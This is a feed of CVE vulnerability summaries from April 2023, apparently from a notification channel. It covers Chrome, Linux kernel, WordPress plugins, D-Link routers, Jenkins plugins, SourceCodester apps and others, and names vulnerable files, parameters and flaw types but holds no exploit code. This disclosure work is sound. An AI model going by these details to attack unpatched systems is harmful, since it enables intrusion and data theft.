🚨 CVE-2023-1823Inappropriate implementation in FedCM in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-10 06:59:29 |
🚨 CVE-2023-1812Out of bounds memory access in DOM Bindings in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-10 06:59:28 |
🚨 CVE-2023-29141An issue was discovered in MediaWiki before 1.35.10, 1.36.x through 1.38.x before 1.38.6, and 1.39.x before 1.39.3. An auto-block can occur for an untrusted X-Forwarded-For header.🎖@cveNotify |
|
| 2023-04-10 06:59:24 |
🚨 CVE-2023-1528Use after free in Passwords in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-10 06:59:23 |
🚨 CVE-2023-1529Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-10 06:59:22 |
🚨 CVE-2023-1530Use after free in PDF in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-10 06:59:21 |
🚨 CVE-2023-1532Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-10 06:59:16 |
🚨 CVE-2023-1533Use after free in WebProtect in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-10 06:59:15 |
🚨 CVE-2023-30456An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.🎖@cveNotify |
|
| 2023-04-10 06:59:14 |
🚨 CVE-2009-10004A vulnerability was found in Turante Sandbox Theme up to 1.5.2. It has been classified as problematic. This affects the function sandbox_body_class of the file functions.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.6.1 is able to address this issue. The name of the patch is 8045b1e10970342f558b2c5f360e0bd135af2b10. It is recommended to upgrade the affected component. The identifier VDB-225357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-10 06:59:13 |
🚨 CVE-2012-10012A vulnerability has been found in BestWebSoft Facebook Like Button up to 2.13 and classified as problematic. Affected by this vulnerability is the function fcbk_bttn_plgn_settings_page of the file facebook-button-plugin.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is 33144ae5a45ed07efe7fceca901d91365fdbf7cb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-225355.🎖@cveNotify |
|
| 2023-04-10 00:58:16 |
🚨 CVE-2012-10011A vulnerability was found in HD FLV PLayer Plugin up to 1.7. It has been rated as critical. Affected by this issue is the function hd_add_media/hd_update_media of the file functions.php. The manipulation of the argument name leads to sql injection. The attack may be launched remotely. Upgrading to version 1.8 is able to address this issue. The name of the patch is 34d66b9f3231a0e2dc0e536a6fe615d736e863f7. It is recommended to upgrade the affected component. VDB-225350 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-09 22:58:18 |
🚨 CVE-2023-27719D-Link DIR878 1.30B08 was discovered to contain a stack overflow in the sub_478360 function. This vulnerability allows attackers to cause a Denial of Service (DoS) or execute arbitrary code via a crafted payload.🎖@cveNotify |
|
| 2023-04-09 22:58:14 |
🚨 CVE-2023-27727Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h.🎖@cveNotify |
|
| 2023-04-09 22:58:13 |
🚨 CVE-2023-27729Nginx NJS v0.7.10 was discovered to contain an illegal memcpy via the function njs_vmcode_return at src/njs_vmcode.c.🎖@cveNotify |
|
| 2023-04-09 22:58:12 |
🚨 CVE-2023-27730Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_lvlhsh_find at src/njs_lvlhsh.c.🎖@cveNotify |
|
| 2023-04-09 10:58:15 |
🚨 CVE-2023-1962A vulnerability classified as critical was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225361 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-09 10:58:14 |
🚨 CVE-2012-10010A vulnerability was found in BestWebSoft Contact Form 3.21. It has been classified as problematic. This affects the function cntctfrm_settings_page of the file contact_form.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.22 is able to address this issue. The name of the patch is 8398d96ff0fe45ec9267d7259961c2ef89ed8005. It is recommended to upgrade the affected component. The identifier VDB-225321 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-09 10:58:13 |
🚨 CVE-2014-125095A vulnerability was found in BestWebSoft Contact Form Plugin 1.3.4 and classified as problematic. Affected by this issue is the function bws_add_menu_render of the file bws_menu/bws_menu.php. The manipulation of the argument bwsmn_form_email leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3.7 is able to address this issue. The name of the patch is 4d531f74b4a801c805dc80360d4ea1312e9a278f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-225320.🎖@cveNotify |
|
| 2023-04-09 06:58:37 |
🚨 CVE-2022-4934A post-auth command injection vulnerability in the exception wizard of Sophos Web Appliance older than version 4.3.10.4 allows administrators to execute arbitrary code.🎖@cveNotify |
|
| 2023-04-09 06:58:33 |
🚨 CVE-2023-1826A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file php-ocls\admin\system_info\index.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-224841 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-09 06:58:32 |
🚨 CVE-2020-36692A reflected XSS via POST vulnerability in report scheduler of Sophos Web Appliance versions older than 4.3.10.4 allows execution of JavaScript code in the victim browser via a malicious form that must be manually submitted by the victim while logged in to SWA.🎖@cveNotify |
|
| 2023-04-09 06:58:31 |
🚨 CVE-2023-26976Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2023-04-09 06:58:30 |
🚨 CVE-2023-1579Heap based buffer overflow in binutils-gdb/bfd/libbfd.c in bfd_getl64.🎖@cveNotify |
|
| 2023-04-09 06:58:25 |
🚨 CVE-2023-0922The Samba AD DC administration tool, when operating against a remote LDAP server, will by default send new or reset passwords over a signed-only connection.🎖@cveNotify |
|
| 2023-04-09 06:58:24 |
🚨 CVE-2023-0225A flaw was found in Samba. An incomplete access check on dnsHostName allows authenticated but otherwise unprivileged users to delete this attribute from any object in the directory.🎖@cveNotify |
|
| 2023-04-09 06:58:23 |
🚨 CVE-2023-1611A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea🎖@cveNotify |
|
| 2023-04-09 06:58:22 |
🚨 CVE-2023-28677Jenkins Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations, allowing attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a convertion by Jenkins Convert To Pipeline Plugin.🎖@cveNotify |
|
| 2023-04-09 06:58:18 |
🚨 CVE-2022-38072An improper array index validation vulnerability exists in the stl_fix_normal_directions functionality of ADMesh Master Commit 767a105 and v0.98.4. A specially-crafted stl file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-09 06:58:17 |
🚨 CVE-2023-28681Jenkins Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-09 06:58:16 |
🚨 CVE-2023-28682Jenkins Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-09 06:58:15 |
🚨 CVE-2023-28683Jenkins Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-09 06:58:14 |
🚨 CVE-2023-28684Jenkins remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-04-09 00:58:17 |
🚨 CVE-2023-30450rpk in Redpanda before 23.1.2 mishandles the redpanda.rpc_server_tls field, leading to (for example) situations in which there is a data type mismatch that cannot be automatically fixed by rpk, and instead a user must reconfigure (while a cluster is turned off) in order to have TLS on broker RPC ports. NOTE: the fix was also backported to the 22.2 and 22.3 branches.🎖@cveNotify |
|
| 2023-04-09 00:58:14 |
🚨 CVE-2023-1377The Solidres WordPress plugin through 0.9.4 does not sanitise and escape numerous parameter before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-09 00:58:13 |
🚨 CVE-2023-0399The Image Over Image For WPBakery Page Builder WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-04-09 00:58:12 |
🚨 CVE-2023-0820The User Role by BestWebSoft WordPress plugin before 1.6.7 does not protect against CSRF in requests to update role capabilities, leading to arbitrary privilege escalation of any role.🎖@cveNotify |
|
| 2023-04-08 18:58:12 |
🚨 CVE-2013-10024A vulnerability has been found in Exit Strategy Plugin 1.55 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file exitpage.php. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.59 is able to address this issue. The name of the patch is d964b8e961b2634158719f3328f16eda16ce93ac. It is recommended to upgrade the affected component. The identifier VDB-225265 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 18:58:11 |
🚨 CVE-2013-10025A vulnerability was found in Exit Strategy Plugin 1.55 and classified as problematic. Affected by this issue is the function exitpageadmin of the file exitpage.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.59 is able to address this issue. The name of the patch is d964b8e961b2634158719f3328f16eda16ce93ac. It is recommended to upgrade the affected component. VDB-225266 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 14:58:13 |
🚨 CVE-2023-1960A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225347.🎖@cveNotify |
|
| 2023-04-08 14:58:12 |
🚨 CVE-2023-1961A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/?page=system_info. The manipulation of the argument System Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225348.🎖@cveNotify |
|
| 2023-04-08 12:58:21 |
🚨 CVE-2023-1957A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_sub_category of the component Subcategory Handler. The manipulation of the argument sub_category leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225344.🎖@cveNotify |
|
| 2023-04-08 12:58:20 |
🚨 CVE-2023-1958A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file /classes/Master.php?f=delete_sub_category. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225345 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 12:58:16 |
🚨 CVE-2023-1959A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_category. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225346 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 12:58:15 |
🚨 CVE-2023-1953A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/sales/index.php. The manipulation of the argument date_start/date_end leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225340.🎖@cveNotify |
|
| 2023-04-08 12:58:14 |
🚨 CVE-2023-1955A vulnerability classified as critical has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected is an unknown function of the file login.php of the component User Registration. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225342 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 12:58:13 |
🚨 CVE-2023-1956A vulnerability classified as critical was found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_img of the component Image Handler. The manipulation of the argument path leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225343.🎖@cveNotify |
|
| 2023-04-08 10:58:23 |
🚨 CVE-2013-10023A vulnerability was found in Editorial Calendar Plugin up to 2.6. It has been declared as critical. Affected by this vulnerability is the function edcal_filter_where of the file edcal.php. The manipulation of the argument edcal_startDate/edcal_endDate leads to sql injection. The attack can be launched remotely. Upgrading to version 2.7 is able to address this issue. The name of the patch is a9277f13781187daee760b4dfd052b1b68e101cc. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-225151.🎖@cveNotify |
|
| 2023-04-08 10:58:21 |
🚨 CVE-2015-10098A vulnerability was found in Broken Link Checker Plugin up to 1.10.5. It has been rated as problematic. Affected by this issue is the function print_module_list/show_warnings_section_notice/status_text/ui_get_action_links. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.10.6 is able to address this issue. The name of the patch is f30638869e281461b87548e40b517738b4350e47. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-225152.🎖@cveNotify |
|
| 2023-04-08 10:58:20 |
🚨 CVE-2023-1952A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been classified as critical. This affects an unknown part of the file /?p=products of the component Product Search. The manipulation of the argument search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225339.🎖@cveNotify |
|
| 2023-04-08 10:58:19 |
🚨 CVE-2023-1948A vulnerability, which was classified as problematic, has been found in PHPGurukul BP Monitoring Management System 1.0. This issue affects some unknown processing of the file add-family-member.php of the component Add New Family Member Handler. The manipulation of the argument Member Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225335.🎖@cveNotify |
|
| 2023-04-08 10:58:17 |
🚨 CVE-2023-1949A vulnerability, which was classified as critical, was found in PHPGurukul BP Monitoring Management System 1.0. Affected is an unknown function of the file change-password.php of the component Change Password Handler. The manipulation of the argument password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225336.🎖@cveNotify |
|
| 2023-04-08 10:58:16 |
🚨 CVE-2023-1950A vulnerability has been found in PHPGurukul BP Monitoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file password-recovery.php of the component Password Recovery. The manipulation of the argument emailid/contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225337 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 10:58:14 |
🚨 CVE-2023-1951A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. Affected by this issue is the function delete_brand of the file /admin/maintenance/brand.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225338 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-08 10:58:13 |
🚨 CVE-2023-24626socket.c in GNU Screen through 4.9.0, when installed setuid or setgid (the default on platforms such as Arch Linux and FreeBSD), allows local users to send a privileged SIGHUP signal to any PID, causing a denial of service or disruption of the target process.🎖@cveNotify |
|
| 2023-04-08 05:58:34 |
🚨 CVE-2023-28675A missing permission check in Jenkins OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier allows attackers to connect to a previously configured Octoperf server using attacker-specified credentials.🎖@cveNotify |
|
| 2023-04-08 05:58:33 |
🚨 CVE-2023-28674A cross-site request forgery (CSRF) vulnerability in Jenkins OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier allows attackers to connect to a previously configured Octoperf server using attacker-specified credentials.🎖@cveNotify |
|
| 2023-04-08 05:58:32 |
🚨 CVE-2023-28879In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.🎖@cveNotify |
|
| 2023-04-08 05:58:31 |
🚨 CVE-2023-28877The VTEX apps-graphql@2.x GraphQL API module does not properly restrict unauthorized access to private configuration data. (apps-graphql@3.x is unaffected by this issue.)🎖@cveNotify |
|
| 2023-04-08 05:58:27 |
🚨 CVE-2023-27159Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.🎖@cveNotify |
|
| 2023-04-08 05:58:26 |
🚨 CVE-2023-0664A flaw was found in the QEMU Guest Agent service for Windows. A local unprivileged user may be able to manipulate the QEMU Guest Agent's Windows installer via repair custom actions to elevate their privileges on the system.🎖@cveNotify |
|
| 2023-04-08 05:58:25 |
🚨 CVE-2022-42431This vulnerability allows local attackers to escalate privileges on affected Tesla vehicles. An attacker must first obtain the ability to execute privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the bcmdhd driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-17544.🎖@cveNotify |
|
| 2023-04-08 05:58:21 |
🚨 CVE-2022-43644This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Dreambox plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19461.🎖@cveNotify |
|
| 2023-04-08 05:58:20 |
🚨 CVE-2022-43645This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the IVI plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19462.🎖@cveNotify |
|
| 2023-04-08 05:58:19 |
🚨 CVE-2022-43647This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19464.🎖@cveNotify |
|
| 2023-04-08 05:58:18 |
🚨 CVE-2022-3210This vulnerability allows network-adjacent attackers to execute arbitrary commands on affected installations of D-Link DIR-2150 4.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the xupnpd service, which listens on TCP port 4044 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-15905.🎖@cveNotify |
|
| 2023-04-08 05:58:14 |
🚨 CVE-2022-42430This vulnerability allows local attackers to escalate privileges on affected Tesla vehicles. An attacker must first obtain the ability to execute privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the wowlan_config data structure. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-17543.🎖@cveNotify |
|
| 2023-04-08 05:58:13 |
🚨 CVE-2022-43642This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the YouTube plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19222.🎖@cveNotify |
|
| 2023-04-08 05:58:12 |
🚨 CVE-2022-43643This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Generic plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19460.🎖@cveNotify |
|
| 2023-04-07 23:58:23 |
🚨 CVE-2023-28645Nextcloud richdocuments is a Nextcloud app integrating the office suit Collabora Online. In affected versions the secure view feature of the rich documents app can be bypassed by using unprotected internal API endpoint of the rich documents app. It is recommended that the Nextcloud Office app (richdocuments) is upgraded to 8.0.0-beta.1, 7.0.2 or 6.3.2. Users unable to upgrade may mitigate the issue by taking steps to restrict the ability to download documents. This includes ensuring that the `WOPI configuration` is configured to only serve documents between Nextcloud and Collabora. It is highly recommended to define the list of Collabora server IPs as the allow list within the Office admin settings of Nextcloud.🎖@cveNotify |
|
| 2023-04-07 23:58:22 |
🚨 CVE-2023-28846Unpoly is a JavaScript framework for server-side web applications. There is a possible Denial of Service (DoS) vulnerability in the `unpoly-rails` gem that implements the Unpoly server protocol for Rails applications. This issues affects Rails applications that operate as an upstream of a load balancer's that uses passive health checks. The `unpoly-rails` gem echoes the request URL as an `X-Up-Location` response header. By making a request with exceedingly long URLs (paths or query string), an attacker can cause unpoly-rails to write a exceedingly large response header. If the response header is too large to be parsed by a load balancer downstream of the Rails application, it may cause the load balancer to remove the upstream from a load balancing group. This causes that application instance to become unavailable until a configured timeout is reached or until an active healthcheck succeeds. This issue has been fixed and released as version 2.7.2.2 which is available via RubyGems and GitHub. Users unable to upgrade may: Configure your load balancer to use active health checks, e.g. by periodically requesting a route with a known response that indicates healthiness; Configure your load balancer so the maximum size of response headers is at least twice the maximum size of a URL; or instead of changing your server configuration you may also configure your Rails application to delete redundant `X-Up-Location` headers set by unpoly-rails.🎖@cveNotify |
|
| 2023-04-07 23:58:18 |
🚨 CVE-2023-1942A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/?page=user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225319.🎖@cveNotify |
|
| 2023-04-07 23:58:17 |
🚨 CVE-2023-28707Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider.This issue affects Apache Airflow Drill Provider: before 2.3.2.🎖@cveNotify |
|
| 2023-04-07 23:58:13 |
🚨 CVE-2023-28843PrestaShop/paypal is an open source module for the PrestaShop web commerce ecosystem which provides paypal payment support. A SQL injection vulnerability found in the PrestaShop paypal module from release from 3.12.0 to and including 3.16.3 allow a remote attacker to gain privileges, modify data, and potentially affect system availability. The cause of this issue is that SQL queries were being constructed with user input which had not been properly filtered. Only deployments on PrestaShop 1.6 are affected. Users are advised to upgrade to module version 3.16.4. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-07 23:58:12 |
🚨 CVE-2023-26829An authentication bypass vulnerability in the Password Reset component of Gladinet CentreStack before 13.5.9808 allows remote attackers to set a new password for any valid user account, without needing the previous known password, resulting in a full authentication bypass.🎖@cveNotify |
|
| 2023-04-07 23:58:11 |
🚨 CVE-2023-0344Akuvox E11 appears to be using a custom version of dropbear SSH server. This server allows an insecure option that by default is not in the official dropbear SSH server.🎖@cveNotify |
|
| 2023-04-07 11:58:14 |
🚨 CVE-2023-28051Dell Power Manager, versions 3.10 and prior, contains an Improper Access Control vulnerability. A low-privileged attacker could potentially exploit this vulnerability to elevate privileges on the system.🎖@cveNotify |
|
| 2023-04-07 05:58:17 |
🚨 CVE-2023-1793A vulnerability was found in SourceCodester Police Crime Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file /officer/assigncase.php of the component GET Parameter Handler. The manipulation of the argument caseid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224745 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-07 05:58:16 |
🚨 CVE-2023-27025An arbitrary file download vulnerability in the background management module of RuoYi v4.7.6 and below allows attackers to download arbitrary files in the server.🎖@cveNotify |
|
| 2023-04-07 05:58:15 |
🚨 CVE-2020-11935It was discovered that aufs improperly managed inode reference counts in the vfsub_dentry_open() method. A local attacker could use this vulnerability to cause a denial of service attack.🎖@cveNotify |
|
| 2023-04-07 00:58:29 |
🚨 CVE-2023-29474inventory in Atos Unify OpenScape 4000 Platform and OpenScape 4000 Manager Platform 10 R1 before 10 R1.34.4 allows an unauthenticated attacker to run arbitrary commands on the platform operating system and achieve administrative access, aka OSFOURK-23552.🎖@cveNotify |
|
| 2023-04-07 00:58:25 |
🚨 CVE-2023-29475inventory in Atos Unify OpenScape 4000 Platform and OpenScape 4000 Manager Platform 10 R1 before 10 R1.34.4 allows an unauthenticated attacker to run arbitrary commands on the platform operating system and achieve administrative access, aka OSFOURK-23543.🎖@cveNotify |
|
| 2023-04-07 00:58:24 |
🚨 CVE-2023-1919[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:23 |
🚨 CVE-2023-1921[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:19 |
🚨 CVE-2023-1923[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:18 |
🚨 CVE-2023-1925[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:17 |
🚨 CVE-2023-1926[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:13 |
🚨 CVE-2023-1928[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:12 |
🚨 CVE-2023-1930[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-07 00:58:11 |
🚨 CVE-2023-1931[PUSHED PREMATURELY] Information temporarily redacted until it should be made public.🎖@cveNotify |
|
| 2023-04-06 22:58:39 |
🚨 CVE-2023-1931The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the deleteCssAndJsCacheToolbar function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to perform cache deletion.🎖@cveNotify |
|
| 2023-04-06 22:58:37 |
🚨 CVE-2023-28500** UNSUPPORTED WHEN ASSIGNED ** A Java insecure deserialization vulnerability in Adobe LiveCycle ES4 version 11.0 and earlier allows unauthenticated remote attackers to gain operating system code execution by submitting specially crafted Java serialized objects to a specific URL. Adobe LiveCycle ES4 version 11.0.1 and later may be vulnerable if the application is installed with Java environment 7u21 and earlier. Exploitation of the vulnerability depends on two factors: insecure deserialization methods used in the Adobe LiveCycle application, and the use of Java environments 7u21 and earlier. The code execution is performed in the context of the account that is running the Adobe LiveCycle application. If the account is privileged, exploitation provides privileged access to the operating system. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-06 22:58:36 |
🚨 CVE-2023-1918The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_callback function. This makes it possible for unauthenticated attackers to invoke a cache building action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:35 |
🚨 CVE-2023-1919The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache-related settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:34 |
